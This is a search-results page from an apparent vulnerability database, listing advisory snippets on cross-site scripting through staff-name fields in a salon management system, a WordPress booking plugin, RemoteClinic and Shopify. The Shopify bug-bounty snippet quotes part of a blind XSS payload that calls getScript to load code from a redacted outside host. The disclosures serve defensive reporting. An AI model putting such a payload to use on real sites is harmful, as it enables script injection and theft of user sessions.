6 matches found
CVE-2025-7140
A vulnerability classified as problematic has been found in SourceCodester Best Salon Management System 1.0. Affected is an unknown function of the file /panel/edit-staff.php of the component Update Staff Page. The manipulation of the argument Staff Name leads to cross site scripting. It is...
PT-2025-28248 · Sourcecodester · Sourcecodester Best Pos Management System
Name of the Vulnerable Software and Affected Versions: SourceCodester Best Salon Management System version 1.0 Description: A problematic issue has been discovered, affecting an unknown function of the file /panel/edit-staff.php of the component Update Staff Page. The manipulation of the Staff Na...
SourceCodester Best Salon Management System Code Injection Vulnerability
SourceCodester Best Salon Management System is an open source salon management system from SourceCodester. A code injection vulnerability exists in version 1.0 of the SourceCodester Best Salon Management System, which originates from incorrect manipulation of the Staff Name parameter in the file...
CVE-2021-24930
The WordPress Online Booking and Scheduling Plugin WordPress plugin before 20.3.1 does not escape the Staff Full Name field before outputting it back in a page, which could lead to a Stored Cross-Site Scripting issue...
Saad Irfan RemoteClinic Cross-Site Scripting Vulnerability
Remote Clinic is an open source clinic management system that allows you to remotely manage your clinic via the Web. A cross-site scripting vulnerability exists in Remote Clinic v2.0. The vulnerability can be exploited to inject arbitrary script or HTML via the First Name or Last Name field of...
Shopify: Blind Stored XSS Via Staff Name
Hey Team, I found blind stored XSS when I add staff name in https://your-store.myshopify.com/admin/settings/account Steps to reproduce: 1. Go to https://your-store.myshopify.com/admin/settings/account 2. Add Staff Account 3. Fill First & Last Name with this payload "$.getScript"//█████████.xss.ht...